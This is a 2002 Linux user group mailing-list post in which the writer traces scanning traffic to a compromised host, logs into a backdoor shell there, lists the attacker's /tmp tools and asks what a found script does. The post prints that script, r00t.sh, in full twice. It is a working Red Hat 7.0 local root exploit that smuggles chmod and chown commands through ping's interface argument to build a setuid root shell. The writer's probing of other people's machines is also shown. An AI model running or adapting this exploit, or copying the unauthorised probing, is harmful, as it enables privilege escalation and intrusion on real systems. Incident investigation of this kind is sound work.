[lug] script kiddie

jdavis lug at taproot.bz
Sat Nov 30 02:56:34 MST 2002 

hello,
  While reviewing last nights Snort logs I noticed alot of ssl - slapper
like activity from one box to my webserver. The box looked to be
in tyland, so i decided to have a look. a nmap scan of the box in tyland
showed nothing intresting except that port 2000 was open. so telnetd
to it and got a shell with apache uid. The shell droped me in / so
I looked in /tmp to see if any slapper files were there...i didnt see
any but there was lots of other stuff. 

h-2.05$ ls -la
ls -la
total 7208
drwxr-xr-x   2 apache   apache       4096 Dec  1 19:36  
drwxr-xr-x   3 apache   apache       4096 Nov 23 10:57   
drwxrwxrwt  20 root     root         4096 Dec  1 21:17 .
drwxr-xr-x  22 root     root         4096 Nov 13 08:53 ..
drwxr-xr-x   3 apache   apache       4096 Nov 15 12:18 .. 
drwxr-xr-x   7 apache   apache       4096 Dec  1 19:21 ...
drwxrwxrwt   3 root     root         4096 Nov 29 09:59 .ICE-unix
-rw-------   1 apache   apache       7248 Dec  1 19:41 .bash_history
srw-------   1 root     nobody          0 Jun 27 23:11 .famSDVA9b
srwx------   1 root     nobody          0 Jul  9 09:10 .fam_socket
srw-------   1 root     nobody          0 Jun 26 18:54 .famsJkAwq
drwxrwxrwt   2 xfs      xfs          4096 Nov 13 08:53 .font-unix
drwxr-xr-x   2 apache   apache       4096 Nov 18 20:33 .fontunix
-rw-------   1 apache   apache      12288 Nov 29 22:32 .psybnc.pid.swp
-rw-r--r--   1 apache   apache          0 Nov 23 10:58
982235016-gtkrc-429249277
-rw-r--r--   1 apache   apache      20266 Apr 14  2001 CHANGES
-rw-------   1 apache   apache      17982 Mar 26  2001 COPYING
-rw-r--r--   1 apache   apache       2660 Mar 26  2001 FAQ
-rw-r--r--   1 apache   apache       1347 Apr 15  2001 Makefile
-rw-r--r--   1 apache   apache      36672 Apr 14  2001 README
-rw-r--r--   1 apache   apache         76 Mar 24  2001 TODO
-rw-------   1 apache   apache       4394 Nov 28 16:21 USER1.LOG
-rw-------   1 apache   apache       1275 Nov 28 04:20 USER2.LOG
-rwxr-xr-x   1 apache   apache     620708 Feb 17  2002 bash
-rw-r--r--   1 apache   apache     616831 May 29  2002 bnc.tar.gz
drwxr-xr-x   6 apache   apache       4096 Dec  1 01:00 com
-rw-r--r--   1 apache   apache     958690 Nov 24 22:26 com.tgz
-rw-r--r--   1 apache   apache     958690 Nov 30 20:12 com.tgz.1
-rw-------   1 apache   apache        783 Aug  6  2000 config.h
drwxr-xr-x   2 apache   apache       4096 Mar 23  2001 help
drwxr-xr-x   2 apache   apache       4096 Dec  1 20:53 log
-rw-r--r--   1 apache   apache        717 Feb 17  2002 makefile.out
-rwxr-xr-x   1 apache   apache       6056 Feb 17  2002 makesalt
-rw-r--r--   1 apache   apache      56981 Dec  1 00:43 massopen
-rw-r--r--   1 apache   apache    1937771 Oct 21 00:40 massopen.tgz
-rw-r--r--   1 apache   apache    1937771 Oct 21 00:40 massopen.tgz.1
drwxr-xr-x   3 apache   apache       4096 Jul 31  2000 menuconf
drwxr-xr-x   2 apache   apache       4096 Dec  1 21:28 motd
drwx------   2 root     root         4096 Jul  9 09:13 orbit-root
-rw-------   1 apache   apache       1262 Nov 28 02:55 psybnc.conf
-rw-------   1 apache   apache       1262 Nov 28 02:54 psybnc.conf.old
-rw-------   1 apache   apache          6 Dec  1 20:39 psybnc.pid
-rwxr-xr-x   1 apache   apache        369 Aug  9  2000 psybncchk
-rwxr-xr-x   1 apache   apache       2311 Nov 26 23:10 r00t.sh
drwxr-xr-x   3 apache   apache       4096 Nov 27 00:04 sawfish-root
drwxr-xr-x   3 apache   apache       4096 Jul 31  2000 scripts
-rw-------   1 root     root            0 Nov 13 08:53 session_mm.sem
drwxr-xr-x   2 apache   apache       4096 Feb 17  2002 src
-rw-------   1 apache   apache       3756 Sep 15  2000 targets.mak
drwxr-xr-x   2 apache   apache       4096 Feb 17  2002 tools
drwxr-xr-x   2 apache   apache       4096 Nov 30 23:51 za


so psybnc is a irc redirector and I know what a salt is but the rest of 
whats happening is news to me. Here is the r00t.sh script...

sh-2.05$ cat r0	
cat r00t.sh 
#!/bin/sh

echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer
<krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo  

PING=/bin/ping6
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Scuze, nu exista setuid pentru ping"
  exit 0
fi

echo "Faza 1: facem lumea in care se poate scrie a / "

$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null

sleep 1

echo "Faza 2: compilam aplicatia helperului in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");
  execl("/bin/bash","bash","-i",0);
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Faza 3: chown+chmod in aplicatia helperului nostru..."

$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Aparent nu-l pot r00ta :("
  exit 1
fi

echo "Hopa .. uite ca esti r00t :)"

/x

echo "Mersi"
#  Nu Mai Floodati ! =-> [www.undernet.org]##!/bin/sh

echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer
<krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo  
echo  

PING=/bin/ping6
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Scuze, nu exista setuid pentru ping"
  exit 0
fi

echo "Faza 1: facem lumea in care se poate scrie a / "

$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null

sleep 1

echo "Faza 2: compilam aplicatia helperului in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");
  execl("/bin/bash","bash","-i",0);
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Faza 3: chown+chmod in aplicatia helperului nostru..."

$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Aparent nu-l pot r00ta :("
  exit 1
fi

echo "Hopa .. uite ca esti r00t :)"

/x

echo "Mersi"
#  Nu Mai Floodati ! =-> [www.undernet.org]#




i looked at 195.117.3.59 a little and got this result...

sh-2.05$ telnet 195.117.3.59 987
telnet 195.117.3.59 987
Trying 195.117.3.59...
Connected to 195.117.3.59.
Escape character is '^]'.
#KM-v0.1b+

upt: 3303336.38 2861753.33
lav: 1.41 1.33 1.17 2/315 3994
mem:  131047424 128679936  2367488 80031744  1622016 20074496
tim: 14:17:24
dat: 2002-12-01
cpu:  13925461 2968956 27263889 286175333
dsk: 24853630 13005890 1223992 0
pid: 3994
fls: 1200
ino: 3968	3064

sockets: used 281
TCP: inuse 200 highest 473
UDP: inuse 20 highest 48
RAW: inuse 1 highest 3
PAC: inuse 0 highest 1
SYN_COOKIES: count 98 since_last_check 0

Connection closed by foreign host.

can anyone tell me what r00t.sh does? And how would one go about
notifing the owners.

jd
jd at taproot.bz
http://www.taproot.bz

More information about the LUG mailing list